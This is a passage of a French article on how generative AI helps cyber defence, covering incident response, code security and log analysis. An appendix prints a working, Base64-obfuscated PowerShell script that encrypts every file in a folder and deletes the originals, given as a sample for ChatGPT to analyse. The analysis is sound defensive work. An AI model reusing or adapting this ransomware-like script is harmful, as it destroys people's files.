<p>Ferrag et al. <a href="#_ref19">[19]</a> utilisent FalconLLM<a href="#_ftn11" name="_ftnref11"><sup>11</sup></a> afin d’analyser la sévérité et l’impact potentiel d’une attaque identifiée par un système de détection d’intrusions en la comparant avec sa base de données interne. De manière similaire à PaloAlto XSOAR, l’outil permet également de proposer des stratégies d’atténuation potentielles et des procédures de rétablissement, pouvant ainsi guider une équipe d’intervention. Les réponses proposées restent cependant très générales et peuvent ne pas être utiles à un administrateur expérimenté (voir Figure 2).</p>
<table class=" aligncenter" style="width: 80%; background-color: #a0a0a0; border-style: solid;" cellpadding="5">
<tbody>
<tr>
<td style="width: 100%;">
<p><strong>Cyber Threats detected by SecurityBERT:</strong></p>
<p>SecurityBERT has detected a cyber threat in our industrial network: a Backdoor attack. Can you propose to me a mitigation solution?</p>
<p><strong>FalconLLM model incident response and recovery output:</strong></p>
<p>Yes, I can. There are a few steps that can be taken to mitigate the Backdoor threat. Firstly, it&#8217;s important to identify the source of the attack. This could be done by monitoring the network traffic and looking for any suspicious activity. Once the source has been identified, it&#8217;s important to block any further attempts to access the network. This can be done by implementing firewalls, intrusion detection systems, and other security measures. Additionally, it&#8217;s important to update all software and patches to ensure that the network is as secure as possible. It&#8217;s also a good idea to regularly audit the network for any potential vulnerabilities.</p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: left;"><em>Figure 2 – Exemple de solution de stratégie d’atténuation proposée par FalconLLM (source <a href="#_ref19">[19]</a>).</em></p>
<p>L’IA générative peut également permettre d’automatiser certains aspects de l’analyse des cyber-incidents par les analystes d’un centre des opérations de sécurité. Par exemple, selon A. Krishnan <a href="#_ref20">[20]</a>, ChatGPT pourrait être utilisé pour décrire ce que fait un script Powershell (voir exemple en annexe). De manière similaire, ces outils permettant aussi de générer du code, il est donc possible d’envisager leur utilisation pour faciliter l’écriture de scripts d’analyse de journaux par des analystes (voir annexe).</p>
<p>L’automatisation de la réponse à des incidents est aussi envisagée, mais un problème important reste l’attribution de la responsabilité. Celle-ci est rendue d’autant plus difficile, qu’à ce jours les systèmes d’IA sont encore peu transparents et difficilement explicables.</p>
<p>Enfin, les rapports détaillés sur les incidents de cybersécurité jouent un rôle important pour aider les principales parties prenantes, notamment les équipes opérationnelles de sécurité, les responsables de la sécurité, afin de mieux comprendre et améliorer la posture de sécurité d’une organisation. Certains envisagent l’utilisation d’IA générative afin de synthétiser les journaux d’incidents et rédiger des rapports permettant d’agir plus rapidement.</p>
<h1>Génération de code sécurisé</h1>
<p>Les vulnérabilités de sécurité dans le code sont un problème récurrent affectant la plupart des logiciels et ayant un impact sur l’intégrité, la confidentialité et la disponibilité. L’utilisation de certains langages de programmation connus pour être moins susceptibles que d’autres à des problèmes classiques est recommandée (par exemple Rust plutôt que C). L’examen du code par d’autres programmeurs experts est aussi une méthode largement répandue.</p>
<p>Mais l’analyse de Ganseman <a href="#_ref21">[21]</a> conduit à se poser la question de l’utilité des LLM pour détecter des erreurs ou bogues dans du code existant ou pour aider à écrire du code plus sécurisé. La difficulté réside dans le fait, qu’à ce jour, il faut indiquer les endroits potentiels où le code n’est pas sûr, c’est-à-dire que c’est le développeur qui doit détecter où une amélioration est possible. Il se pourrait que dans un avenir proche, une base de code entière puisse être soumise à un examen de sécurité, mais pour l’instant, cela reste limité à la longueur du contexte et plus la question est précise, meilleure est la réponse.</p>
<p>Paradoxalement, Perry et al. <a href="#_ref22">[22]</a> ont rapporté dans une étude récente que, bien que les assistants augmentent la productivité des développeurs, les participants ayant accès à un assistant basé sur un modèle d’IA (en l’occurrence le <em>codex-davinci-002</em> de OpenAI) écrivaient un code significativement moins sécurisé que ceux sans accès. Pire, les participants avec un accès à l’assistant étaient plus enclins à croire qu’ils écrivaient du code sécurisé, que ceux sans l’assistant. L’adoption d’assistants impose donc la mise en place de pratiques de revue de code et d’analyse statique systématiques <a href="#_ref21">[21]</a>.</p>
<h1>Conclusion</h1>
<p>Même si les progrès de l’IA sont fulgurants dans beaucoup de domaines, l&#8217;apport non-négligeable de l&#8217;IA à la défense des systèmes informatiques reste néanmoins limité&nbsp;: nous sommes en effet encore loin des outils où il suffirait de donner des terra-octets de divers journaux d’événements pour que rapidement les signes d’intrusions soient détectés avec très peu d’erreur.</p>
<p>Aujourd’hui les méthodes statistiques spécialisées et d’apprentissage automatique – comme par exemple la détection d’anomalies – continuent de faire l’objet de recherches importantes et sont ajoutées aux outils commerciaux de détection d’intrusion avec l’étiquette « IA. » Mais en y regardant de plus près, l’IA apparaît principalement comme un nouvel outil de « productivité » pour des professionnels de cybersécurité, contribuant à l&#8217;automatisation de certaines tâches de cyber-défense, ou facilitant la réponse à des incidents et le traitement des renseignements sur les menaces, mais ne remplaçant pas l’analyste humain.</p>
<h1>Références</h1>
<p><a name="_ref1"></a>[1]        B. Schneier, « Artificial Intelligence and the Attack/Defense Balance », <em>IEEE Secur. Priv.</em>, vol. 16, n<sup>o</sup> 2, p. 96‑96, mars 2018, doi: <a href="https://doi.org/10.1109/MSP.2018.1870857" target="_blank" rel="noopener">10.1109/MSP.2018.1870857</a>.</p>
<p><a name="_ref2"></a>[2]        I. H. Sarker, H. Janicke, L. Maglaras, et S. Camtepe, « Data-Driven Intelligence can Revolutionize Today’s Cybersecurity World: A Position Paper ». arXiv, 9 août 2023. Consulté le: 27 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2308.05126" target="_blank" rel="noopener">http://arxiv.org/abs/2308.05126</a></p>
<p><a name="_ref3"></a>[3]        J. D’Hoinne, A. Litan, et P. Firstbrook, « 4 Ways Generative AI Will Impact CISOs and Their Teams », Gartner, G00793265, juin 2023.</p>
<p><a name="_ref4"></a>[4]        M. Taddeo, T. McCutcheon, et L. Floridi, « Trusting artificial intelligence in cybersecurity is a double-edged sword », <em>Nat. Mach. Intell.</em>, vol. 1, n<sup>o</sup> 12, p. 557‑560, nov. 2019, doi: <a href="https://doi.org/10.1038/s42256-019-0109-1" target="_blank" rel="noopener noopnener">10.1038/s42256-019-0109-1</a><a>.</a></p>
<p><a name="_ref5"></a>[5]        D. Dasgupta, Z. Akhtar, et S. Sen, « Machine learning in cybersecurity: a comprehensive survey », <em>J. Def. Model. Simul. Appl. Methodol. Technol.</em>, vol. 19, n<sup>o</sup> 1, p. 57‑106, janv. 2022, doi: <a href="https://doi.org/10.1177/1548512920951275" target="_blank" rel="noopener">10.1177/1548512920951275</a>.</p>
<p><a name="_ref6"></a>[6]        M. Nouh, J. R. C. Nurse, H. Webb, et M. Goldsmith, « Cybercrime Investigators are Users Too! Understanding the Socio-Technical Challenges Faced by Law Enforcement », in <em>Proceedings 2019 Workshop on Usable Security</em>, 2019. doi: <a href="https://doi.org/10.14722/usec.2019.23032" target="_blank" rel="noopener">10.14722/usec.2019.23032</a>.</p>
<p><a name="_ref7"></a>[7]        J. R. G. Evangelista, R. J. Sassi, M. Romero, et D. Napolitano, « Systematic Literature Review to Investigate the Application of Open Source Intelligence (OSINT) with Artificial Intelligence », <em>J. Appl. Secur. Res.</em>, vol. 16, n<sup>o</sup> 3, p. 345‑369, juill. 2021, doi: <a href="https://doi.org/10.1080/19361610.2020.1761737" target="_blank" rel="noopener">10.1080/19361610.2020.1761737</a>.</p>
<p><a name="_ref8"></a>[8]        M. Sewak, V. Emani, et A. Naresh, « CRUSH: Cybersecurity Research using Universal LLMs and Semantic Hypernetworks », 2023.</p>
<p><a name="_ref9"></a>[9]        K. A. Scarfone et P. M. Mell, « Guide to intrusion detection and prevention systems (IDPS) », National Institute of Standards and Technology, Gaithersburg, MD, NIST SP 800-94, 2007. doi: <a href="https://doi.org/10.6028/NIST.SP.800-94" target="_blank" rel="noopener">10.6028/NIST.SP.800-94</a>.</p>
<p><a name="_ref10"></a>[10]       D. Denning, « An Intrusion-Detection Model », <em>IEEE Trans. Softw. Eng.</em>, vol. 13, n<sup>o</sup> 2, p. 222‑232, 20.</p>
<p><a name="_ref11"></a>[11]       G. Apruzzese <em>et al.</em>, « The role of machine learning in cybersecurity », <em>Digit. Threats Res. Pract.</em>, vol. 4, n<sup>o</sup> 1, p. 1‑38, mars 2023, doi: <a href="https://doi.org/10.1145/3545574" target="_blank" rel="noopener">10.1145/3545574</a>.</p>
<p><a name="_ref12"></a>[12]       A. Bohara, M. A. Noureddine, A. Fawaz, et W. H. Sanders, « An Unsupervised Multi-Detector Approach for Identifying Malicious Lateral Movement », in <em>2017 IEEE 36th Symposium on Reliable Distributed Systems (SRDS)</em>, Hong Kong, Hong Kong: IEEE, sept. 2017, p. 224‑233. doi: <a href="https://doi.org/10.1109/SRDS.2017.31" target="_blank" rel="noopener noopnener">10.1109/SRDS.2017.31</a><a>.</a></p>
<p><a name="_ref13"></a>[13]       G. Apruzzese, M. Marchetti, M. Colajanni, G. G. Zoccoli, et A. Guido, « Identifying malicious hosts involved in periodic communications », in <em>2017 IEEE 16th International Symposium on Network Computing and Applications (NCA)</em>, Cambridge, MA: IEEE, oct. 2017, p. 1‑8. doi: <a href="https://doi.org/10.1109/NCA.2017.8171326" target="_blank" rel="noopener noopnener">10.1109/NCA.2017.8171326</a><a>.</a></p>
<p><a name="_ref14"></a>[14]       J. Yang, T. Li, G. Liang, W. He, et Y. Zhao, « A Simple Recurrent Unit Model Based Intrusion Detection System With DCGAN », <em>IEEE Access</em>, vol. 7, p. 83286‑83296, 2019, doi: <a href="https://doi.org/10.1109/ACCESS.2019.2922692" target="_blank" rel="noopener noopnener">10.1109/ACCESS.2019.2922692</a><a>.</a></p>
<p><a name="_ref15"></a>[15]       L. Cavallaro, J. Kinder, F. Pendlebury, et F. Pierazzi, « Are Machine Learning Models for Malware Detection Ready for Prime Time? », <em>IEEE Secur. Priv.</em>, vol. 21, n<sup>o</sup> 2, p. 53‑56, mars 2023, doi: <a href="https://doi.org/10.1109/MSEC.2023.3236543" target="_blank" rel="noopener noopnener">10.1109/MSEC.2023.3236543</a><a>.</a></p>
<p><a name="_ref16"></a>[16]       J. L. Hernández-Ramos <em>et al.</em>, « Intrusion detection based on federated learning: a systematic review ». arXiv, 18 août 2023. Consulté le: 17 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2308.09522" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2308.09522</a></p>
<p><a name="_ref17"></a>[17]       Y.-H. Su, M. C. Y. Cho, et H.-C. Huang, « False Alert Buster: an Adaptive Approach for NIDS False Alert Filtering », in <em>Proceedings of the 2nd International Conference on Computing and Big Data</em>, Taichung Taiwan: ACM, oct. 2019, p. 58‑62. doi: <a href="https://doi.org/10.1145/3366650.3366657" target="_blank" rel="noopener noopnener">10.1145/3366650.3366657</a><a>.</a></p>
<p><a name="_ref18"></a>[18]       M. Gupta, C. Akiri, K. Aryal, E. Parker, et L. Praharaj, « From ChatGPT to ThreatGPT: Impact of generative AI in cybersecurity and privacy », <em>IEEE Access</em>, vol. 11, p. 80218‑80245, août 2023, doi: 10.1109/ACCESS.2023.3300381.</p>
<p><a name="_ref19"></a>[19]       M. A. Ferrag, M. Ndhlovu, N. Tihanyi, L. C. Cordeiro, M. Debbah, et T. Lestable, « Revolutionizing Cyber Threat Detection with Large Language Models ». arXiv, 25 juin 2023. Consulté le: 8 novembre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2306.14263" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2306.14263</a></p>
<p><a name="_ref20"></a>[20]       A. Krishnan, « 4 ChatGPT cybersecurity benefits for the enterprise | TechTarget », Security. Consulté le: 12 octobre 2023. [En ligne]. Disponible sur: <a href="https://www.techtarget.com/searchsecurity/tip/ChatGPT-cybersecurity-benefits-for-the-enterprise" target="_blank" rel="noopener noopnener">https://www.techtarget.com/searchsecurity/tip/ChatGPT-cybersecurity-benefits-for-the-enterprise</a></p>
<p><a name="_ref21"></a>[21]       J. Ganseman, « LLM pour code : the Good, the Bad and the Ugly | Smals Research », Smals Research Blog. Consulté le: 18 octobre 2023. [En ligne]. Disponible sur: <a href="/llms-pour-code/" target="_blank" rel="noopener noopnener">/llms-pour-code/</a></p>
<p><a name="_ref22"></a>[22]       N. Perry, M. Srivastava, D. Kumar, et D. Boneh, « Do Users Write More Insecure Code with AI Assistants? » arXiv, 16 décembre 2022. Consulté le: 3 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2211.03622" target="_blank" rel="noopener noopnener">http://arxiv.org/abs/2211.03622</a></p>
<h1>Annexe 1 – Analyse de script malveillant avec ChatGPT</h1>
<p>L’exemple ci-dessous montre la réponse de ChatGPT 4.0 à la question « Que fait ce code ? » suivie d’un échantillon de code. On constate que malgré la tentative d’obfuscation et les commentaires erronés, ChatGPT analyse avec pertinence ce script qui chiffre tous les fichiers dans le dossier &#8220;<code>C:\Local\chat_gpt_ps\test</code>&#8221; ses sous-dossiers.</p>
<h2>Script soumis à ChatGPT</h2>
<div>
<pre><code><span style="color: #0000ff;">function </span><span style="color: #795e00;">Compute_SHA256 </span>{</code><br /><code>    <span style="color: #008000;"># Compute SHA 256 of an object in memory</span></code><br /><code>    [<span style="color: #795e00;">CmdletBinding</span>()]</code><br /><code>    [<span style="color: #795e00;">OutputType</span>([<span style="color: #0000ff;">string</span>])]</code><br /><code>    <span style="color: #af00db;">Param</span></code><br /><code>    (</code><br /><code>        [<span style="color: #795e00;">Parameter</span>(<span style="color: #001080;">Mandatory </span>= <span style="color: #0000ff;">$true</span>)]</code><br /><code>        [<span style="color: #0000ff;">String</span>]<span style="color: #001080;">$salt</span>,</code><br /><code>        [<span style="color: #795e00;">Parameter</span>(<span style="color: #001080;">Mandatory </span>= <span style="color: #0000ff;">$true</span>, <span style="color: #001080;">ParameterSetName </span>= <span style="color: #a31515;">"param"</span>)]</code><br /><code>        [<span style="color: #0000ff;">String</span>]<span style="color: #001080;">$object</span></code><br /><code>    )</code><br /><code>    <span style="color: #af00db;">Begin</span> {</code><br /><code>        <span style="color: #008000;"># Initialise hashing function</span></code><br /><code>        <span style="color: #001080;">$tmp</span> = <span style="color: #795e00;">New-Object</span> byte[] <span style="color: #008000;">16</span></code><br /><code>        <span style="color: #001080;">$sha1</span> = <span style="color: #795e00;">New-Object</span> System.Security.Cryptography.SHA256Managed</code><br /><code>        <span style="color: #001080;">$sha2</span> = <span style="color: #795e00;">New-Object</span> System.Security.Cryptography.AesManaged</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Mode</span> = <span style="color: #a31515;">'CBC'</span> -as [<span style="color: #0000ff;">System.Security.Cryptography.CipherMode</span>]</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Padding</span> = <span style="color: #a31515;">'Zeros'</span> -as [<span style="color: #0000ff;">System.Security.Cryptography.PaddingMode</span>]</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.BlockSize</span> = <span style="color: #008000;">128</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.KeySize</span> = <span style="color: #008000;">256</span></code><br /><code>        [<span style="color: #0000ff;">void</span>][<span style="color: #0000ff;">Security.Cryptography.RNGCryptoServiceProvider</span>]::Create().GetBytes($tmp)</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.IV</span> = <span style="color: #001080;">$tmp</span></code><br /><code>    }</code><br /><code>    <span style="color: #af00db;">Process</span> {</code><br /><code>        <span style="color: #008000;"># Compute hash</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Key</span> = <span style="color: #001080;">$sha1</span><span style="color: #795e00;">.ComputeHash</span>([<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetBytes($salt))</code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"R2V0LUl0ZW0gLVBhdGggJG9iamVjdCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=="</span>))</code><br /><code>        <span style="color: #001080;">$object2</span> = <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #af00db;">if</span> (!<span style="color: #001080;">$object2</span><span style="color: #795e00;">.FullName</span>) {</code><br /><code>            <span style="color: #af00db;">break</span></code><br /><code>        }</code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"W1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRvYmplY3QyLkZ1bGxOYW1lKQ=="</span>))</code><br /><code>        <span style="color: #001080;">$input</span> = <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #001080;">$output</span> = <span style="color: #001080;">$object2</span><span style="color: #795e00;">.FullName</span> + <span style="color: #a31515;">".xxx"</span></code><br /><code>        <span style="color: #001080;">$sha2_hasher</span> = <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.CreateEncryptor</span>()</code><br /><code>        <span style="color: #001080;">$encryptedBytes</span> = <span style="color: #001080;">$sha2_hasher</span><span style="color: #795e00;">.TransformFinalBlock</span>($input, 0, $input.Length)</code><br /><code>        <span style="color: #001080;">$encryptedBytes</span> = <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.IV</span> + <span style="color: #001080;">$encryptedBytes</span></code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>       </code><br /><code>        <span style="color: #001080;">$e</span> = <span style="color: #001080;">$output</span></code><br /><code>        <span style="color: #001080;">$encD</span> = <span style="color: #001080;">$encryptedBytes</span></code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"W1N5c3RlbS5JTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkZSwgJGVuY0Qp"</span>))</code><br /><code>        <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        (<span style="color: #795e00;">Get-Item</span> <span style="color: #001080;">$output</span>).LastWriteTime = $object2<span style="color: #795e00;">.LastWriteTime</span></code><br /><code>        <span style="color: #001080;">$f</span> = <span style="color: #001080;">$object2</span></code><br /><code>        <span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"UmVtb3ZlLUl0ZW0gLVBhdGgg"</span>)) + <span style="color: #a31515;">"'</span><span style="color: #001080;">$f<span style="color: #a31515;">'"</span></span></code><br /><code>        <span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span></code><br /><code>        <span style="color: #af00db;">return</span> <span style="color: #a31515;">"Sortie:</span> <span style="color: #001080;">$output</span><span style="color: #a31515;">"</span>        </code><br /><code>    }</code><br /><code>    <span style="color: #af00db;">End</span> {</code><br /><code>        <span style="color: #001080;">$sha1</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>        <span style="color: #001080;">$sha2</span><span style="color: #795e00;">.Dispose</span>()</code><br /><code>    }</code><br /><code>}</code><br /><br /><code><span style="color: #001080;">$dynCmd</span> = [<span style="color: #0000ff;">System.Text.Encoding</span>]::UTF8.GetString([<span style="color: #0000ff;">Convert</span>]::FromBase64String(<span style="color: #a31515;">"R2V0LUNoaWxkSXRlbSAtUGF0aCAiQzpcTG9jYWxcY2hhdF9ncHRfcHNcdGVzdCIgLUZpbGUgLVJlY3Vyc2U="</span>))<br /></code><br /><code><span style="color: #795e00;">Invoke-Expression</span> <span style="color: #001080;">$dynCmd</span> | <span style="color: #795e00;">ForEach-Object</span> {</code><br /><code>    <span style="color: #001080;">$object</span> = <span style="color: #001080;">$_</span><span style="color: #795e00;">.FullName</span></code><br /><code>    Compute_SHA256 -salt <span style="color: #a31515;">"salty"</span> -object <span style="color: #001080;">$object</span></code><br /><code>}</code></pre>
</div>
<h2>Réponse de ChatGPT</h2>
<p>Ce script PowerShell définit une fonction nommée <strong>Compute_SHA256</strong>, qui effectue plusieurs opérations sur les fichiers, notamment le calcul du hachage SHA-256, le chiffrement AES, et la manipulation de fichiers. Voici un détail étape par étape de ce que fait le script&nbsp;:</p>
<ol>
<li><strong>Initialisation</strong>&nbsp;:
<ul>
<li>Définition de paramètres pour la fonction <strong>Compute_SHA256</strong> qui incluent un <strong>salt</strong> et un <strong>object</strong> (nom de fichier).</li>
<li>Initialisation d&#8217;un objet de cryptographie AES (<strong>$sha2</strong>) avec des paramètres spécifiques pour le mode de chiffrement, le padding, la taille de bloc, et la taille de clé.</li>
</ul>
</li>
<li><strong>Traitement</strong>&nbsp;:
<ul>
<li>Utilisation de SHA-256 pour générer une clé de chiffrement à partir du <strong>salt</strong></li>
<li>Déchiffrement de chaînes codées en Base64 pour obtenir des commandes PowerShell qui sont exécutées dynamiquement pour&nbsp;:
<ul>
<li>Lire le contenu d&#8217;un fichier spécifié.</li>
<li>Chiffrer le contenu du fichier avec AES en utilisant la clé générée précédemment.</li>
<li>Concaténer le vecteur d&#8217;initialisation (<strong>IV</strong>) avec le contenu chiffré.</li>
<li>Écrire les données chiffrées dans un nouveau fichier avec l&#8217;extension <strong>.xxx</strong>.</li>
<li>Mettre à jour le timestamp du nouveau fichier pour qu&#8217;il corresponde à celui de l&#8217;original.</li>
<li>Supprimer le fichier original.</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="3">
<li><strong>Fin de traitement</strong>&nbsp;:
<ul>
<li>Libération des ressources utilisées par les objets de cryptographie.</li>
</ul>
</li>
<li><strong>Exécution</strong>&nbsp;:
<ul>
<li>Le script exécute une commande pour lister tous les fichiers dans un chemin spécifié de manière récursive.</li>
<li>Pour chaque fichier trouvé, il appelle la fonction <strong>Compute_SHA256</strong> avec un <strong>salt</strong> fixe (&#8220;salty&#8221;) et le chemin du fichier.</li>
</ul>
</li>
</ol>
<p><strong>Objectifs principaux du script</strong></p>
<ul>
<li><strong>Chiffrer des fichiers</strong>&nbsp;: Le contenu des fichiers est chiffré avec AES, utilisant une clé dérivée d&#8217;un <strong>salt</strong>.</li>
<li><strong>Suppression sécurisée</strong>&nbsp;: Après le chiffrement, les fichiers originaux sont supprimés, ce qui pourrait être utilisé pour une sorte de nettoyage de données.</li>
<li><strong>Automatisation de processus</strong>&nbsp;: L&#8217;exécution des commandes est effectuée de manière dynamique, probablement pour masquer les actions effectuées (en utilisant le décodage Base64 pour cacher les commandes réelles).</li>
</ul>
<p><strong>Points d&#8217;attention</strong></p>
<ul>
<li><strong>Sécurité</strong>&nbsp;: Le script effectue des actions dynamiques (via <strong>Invoke-Expression</strong>), ce qui peut être risqué si les entrées ne sont pas correctement validées ou si le script est utilisé dans un environnement non sécurisé.</li>
</ul>
<p><strong>Modification de données</strong>&nbsp;: Il supprime les fichiers originaux après le chiffrement, ce qui peut entraîner une perte de données si le processus n&#8217;est pas contrôlé.</p>
<h2>Question complémentaire</h2>
<p>Où constates-tu que les fichiers originaux sont supprimés?</p>
<h2>Réponse de ChatGPT</h2>
<p>Les fichiers originaux sont supprimés à la fin de la section de traitement (<strong>Process</strong>) de la fonction <strong>Compute_SHA256</strong>. Cela est réalisé grâce à ces étapes spécifiques dans le script&nbsp;:</p>
<ol>
<li>La variable <strong>$f</strong> est assignée à <strong>$object2</strong>, qui contient les informations sur le fichier original.</li>
<li>Une chaîne de commande est construite pour exécuter la commande <strong>Remove-Item</strong>, qui est utilisée pour supprimer des fichiers. La commande est constituée en concaténant la chaîne <strong>&#8220;Remove-Item -Path &#8220;</strong> avec le chemin complet du fichier contenu dans <strong>$f</strong>.</li>
<li>La commande complète est exécutée avec <strong>Invoke-Expression</strong>, effectuant la suppression du fichier original spécifié par <strong>$f</strong>.</li>
</ol>
<p>Voici la portion pertinente du script où cela se produit&nbsp;:</p>
<pre><code>$f = $object2</code><br /><code>$dynCmd = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("UmVtb3ZlLUl0ZW0gLVBhdGgg")) + "'$f'"</code><br /><code>Invoke-Expression $dynCmd</code></pre>
<p>La chaîne codée en Base64 <strong>&#8220;UmVtb3ZlLUl0ZW0gLVBhdGgg&#8221;</strong> est décodée pour donner <strong>&#8220;Remove-Item -Path &#8220;</strong>, formant ainsi la commande complète pour supprimer le fichier.</p>
<h1>Annexe 2 – Génération de script d’analyse</h1>
<p>Example de génération d’un script d’analyse très simple d’un journal d’événement dans le langage SPL de Splunk.</p>
<h2>Demande faite à ChatGPT</h2>
<p>Écris un script Splunk qui filtre les entrées dont l’adresse source IP n’est pas réservée et n’est pas en Belgique et dont la destination est une IP de classe A commençant par 10.</p>
<h2>Réponse de ChatGPT</h2>
<p>Pour créer un script Splunk qui filtre les entrées de journalisation en fonction de l&#8217;adresse IP source (qui n&#8217;est ni réservée ni en Belgique) et de l&#8217;adresse IP de destination (qui commence par 10), il faudrait d&#8217;abord disposer d&#8217;une liste des plages d&#8217;adresses IP attribuées à la Belgique. Cependant, Splunk en soi n&#8217;effectue pas de géolocalisation directe des adresses IP. Vous auriez besoin d&#8217;une table de correspondance IP-pays ou d&#8217;utiliser une fonctionnalité d&#8217;enrichissement des données qui mappe les adresses IP aux pays.</p>
<p>Pour les besoins de cet exemple, je vais supposer que vous avez accès à une telle table ou à une fonctionnalité dans Splunk. Je vais également supposer que les champs sont nommés <strong>src_ip</strong> pour l&#8217;adresse IP source et <strong>dest_ip</strong> pour l&#8217;adresse IP de destination.</p>
<p>Voici comment pourrait ressembler votre script Splunk&nbsp;:</p>
<pre><code>index=ton_index | lookup ip_country_lookup src_ip OUTPUT country | search NOT [ search index=ton_index | lookup ip_country_lookup src_ip OUTPUT country | search country="BE" | fields src_ip ] | regex src_ip!="^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)" | regex dest_ip="^10\." | table src_ip, dest_ip, country, _raw</code></pre>
<p>Explication du script&nbsp;:</p>
<ol>
<li><strong>index=ton_index</strong>&nbsp;: Remplace <strong>ton_index</strong> par l&#8217;index approprié qui contient tes données de logs.</li>
<li><strong>lookup ip_country_lookup src_ip OUTPUT country</strong>&nbsp;: Effectue un lookup pour déterminer le pays de l&#8217;adresse IP source. Remplace <strong>ip_country_lookup</strong> par le nom réel de ta table de lookup ou de ton enrichissement de données qui mappe les adresses IP aux pays.</li>
<li>La sous-requête <strong>search NOT [&#8230;]</strong> exclut toutes les adresses IP provenant de la Belgique. <strong>fields src_ip</strong> est utilisé pour retourner uniquement les adresses IP de la sous-requête.</li>
<li><code>regex src_ip!="^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)"</code>&nbsp;: Exclut les adresses IP réservées.</li>
<li><strong>regex dest_ip=&#8221;^10\.&#8221;</strong>&nbsp;: Filtre pour inclure uniquement les entrées dont l&#8217;adresse IP de destination commence par 10.</li>
<li><strong>table src_ip, dest_ip, country, _raw</strong>&nbsp;: Affiche les adresses IP source et destination, le pays de l&#8217;adresse source, et la ligne brute du journal.</li>
</ol>
<p>Ce script nécessite que tu aies une lookup table configurée correctement pour la correspondance des adresses IP aux pays, ce qui n&#8217;est pas automatiquement disponible dans Splunk. Il te faudra configurer ou obtenir ces données par toi-même ou utiliser une application Splunk tierce qui offre cette capacité.</p>
<h1>Notes</h1>
<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a>   <a href="https://cordis.europa.eu/project/id/700692" target="_blank" rel="noopener">https://cordis.europa.eu/project/id/700692</a></p>
<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a>   Une analyse systématique des publications sur l’utilisation de l’IA pour l’OSINT montre que la cybersécurité représente près de la moitié des publications considérées <a href="#_ref7">[7]</a>.</p>
<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a>   Les auteurs indiquent un rappel de 90%. En général, le rappel est défini par le nombre de documents pertinents retrouvés au regard du nombre de documents pertinents que possède la base de données.</p>
<p><a href="#_ftnref4" name="_ftn4"><sup>4</sup></a>   Son modèle utilise des statistiques pour la détection des anomalies (modèle statistique simple, chaîne de Markov et séries temporelles).</p>
<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a>   <a href="https://www.cloudflare.com/fr-fr/learning/security/glossary/what-is-lateral-movement/" target="_blank" rel="noopener">https://www.cloudflare.com/fr-fr/learning/security/glossary/what-is-lateral-movement/</a></p>
<p><a href="#_ftnref6" name="_ftn6"><sup>6</sup></a>   <a href="https://github.com/GreyDGL/PentestGPT" target="_blank" rel="noopener">https://github.com/GreyDGL/PentestGPT</a></p>
<p><a href="#_ftnref7" name="_ftn7"><sup>7</sup></a>   <a href="https://www.hackthebox.com/" target="_blank" rel="noopener">https://www.hackthebox.com/</a></p>
<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a>   Supposons que dans un journal d’un million d’événements, on estime qu’il y ait 100 événements correspondant réellement à une intrusion. Supposons également qu’un fabriquant nous vende un système de détection d’intrusion dont la sensibilité est de 99,9%, c’est-à-dire qu’il y a un taux de 0,1% de faux négatifs parmi les événements correspondant à de véritables intrusions, et dont la spécificité est également de 99,9% c’est-à-dire qu’il y a un taux de 0,1% de faux positifs parmi les événements ne correspondant pas à des intrusions. Si le logiciel du fabriquant signale une alerte, quelle est alors la probabilité que celle-ci corresponde effectivement à une intrusion ?</p>
